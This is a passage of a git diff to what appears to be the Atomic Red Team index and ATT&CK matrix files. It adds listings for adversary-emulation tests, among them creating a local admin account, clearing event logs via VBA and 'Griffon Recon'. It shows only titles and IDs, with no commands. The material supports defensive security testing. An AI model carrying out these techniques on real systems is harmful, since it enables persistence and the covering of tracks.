Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt @@ -447,6 +452,7 @@ discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows), discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt +discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt @@ -547,5 +553,6 @@ lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-b lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell +initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 5e5dcd3e..078628b9 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -81,7 +81,8 @@ - Atomic Test #1: Launch Daemon [macos] - [T1053.004 Launchd](../../T1053.004/T1053.004.md) - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - Atomic Test #1: Logon Scripts - Mac [macos] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) @@ -281,7 +282,8 @@ - Atomic Test #4: Create a new user in PowerShell [windows] - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - Atomic Test #6: Create a new Windows admin user [windows] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - Atomic Test #1: Logon Scripts - Mac [macos] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) @@ -594,6 +596,7 @@ - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md) - Atomic Test #1: Clear Logs [windows] - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows] + - Atomic Test #3: Clear Event Logs via VBA [windows] - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md) @@ -703,7 +706,8 @@ - Atomic Test #2: Create Hidden User using IsHidden option [macos] - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md) - Atomic Test #1: Hidden Window [windows] -- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1564 Hide Artifacts](../../T1564/T1564.md) + - Atomic Test #1: Extract binary files via VBA [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md) - Atomic Test #1: Disable history collection [linux, macos] @@ -749,7 +753,8 @@ - Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux] - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux] - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - [T1127.001 MSBuild](../../T1127.001/T1127.001.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1133,6 +1138,7 @@ - Atomic Test #6: Hostname Discovery (Windows) [windows] - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #8: Windows MachineGUID Discovery [windows] + - Atomic Test #9: Griffon Recon [windows] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] @@ -1480,7 +1486,8 @@ - [T1133 External Remote Services](../../T1133/T1133.md) - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1566.001 Spearphishing Attachment](../../T1566.001/T1566.001.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 576b8e04..75a6f459 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -191,7 +191,8 @@ - Atomic Test #1: IFEO Add Debugger [windows] - Atomic Test #2: IFEO Global Flags [windows] - T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - Atomic Test #1: Logon Scripts [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -299,6 +300,7 @@ - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md) - Atomic Test #1: Clear Logs [windows] - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows] + - Atomic Test #3: Clear Event Logs via VBA [windows] - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md) - Atomic Test #1: Compile After Delivery using csc.exe [windows] @@ -374,7 +376,8 @@ - Atomic Test #4: Create Windows Hidden File with Attrib [windows] - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md) - Atomic Test #1: Hidden Window [windows] -- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1564 Hide Artifacts](../../T1564/T1564.md) + - Atomic Test #1: Extract binary files via VBA [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -399,7 +402,8 @@ - Atomic Test #7: InstallUtil HelpText method call [windows] - Atomic Test #8: InstallUtil evasive invocation [windows] - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - [T1127.001 MSBuild](../../T1127.001/T1127.001.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -628,7 +632,8 @@ - Atomic Test #3: Create a new user in a command prompt [windows] - Atomic Test #4: Create a new user in PowerShell [windows] - Atomic Test #6: Create a new Windows admin user [windows] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - Atomic Test #1: Logon Scripts [windows] - [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) @@ -831,6 +836,7 @@ - Atomic Test #1: System Information Discovery [windows] - Atomic Test #6: Hostname Discovery (Windows) [windows] - Atomic Test #8: Windows MachineGUID Discovery [windows] + - Atomic Test #9: Griffon Recon [windows] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] @@ -1057,7 +1063,8 @@ - [T1133 External Remote Services](../../T1133/T1133.md) - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1566.001 Spearphishing Attachment](../../T1566.001/T1566.001.md) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index a4b8e7ab..6003ff26 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -11,7 +11,7 @@ | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Local Accounts](../../T1078.003/T1078.003.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -44,17 +44,17 @@ | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | | | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | +| | | [Local Accounts](../../T1078.003/T1078.003.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | | | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | | | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | | | | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | | | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -68,7 +68,7 @@ | | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | -| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 6c68ed7b..8f68ade4 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -10,7 +10,7 @@ | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A 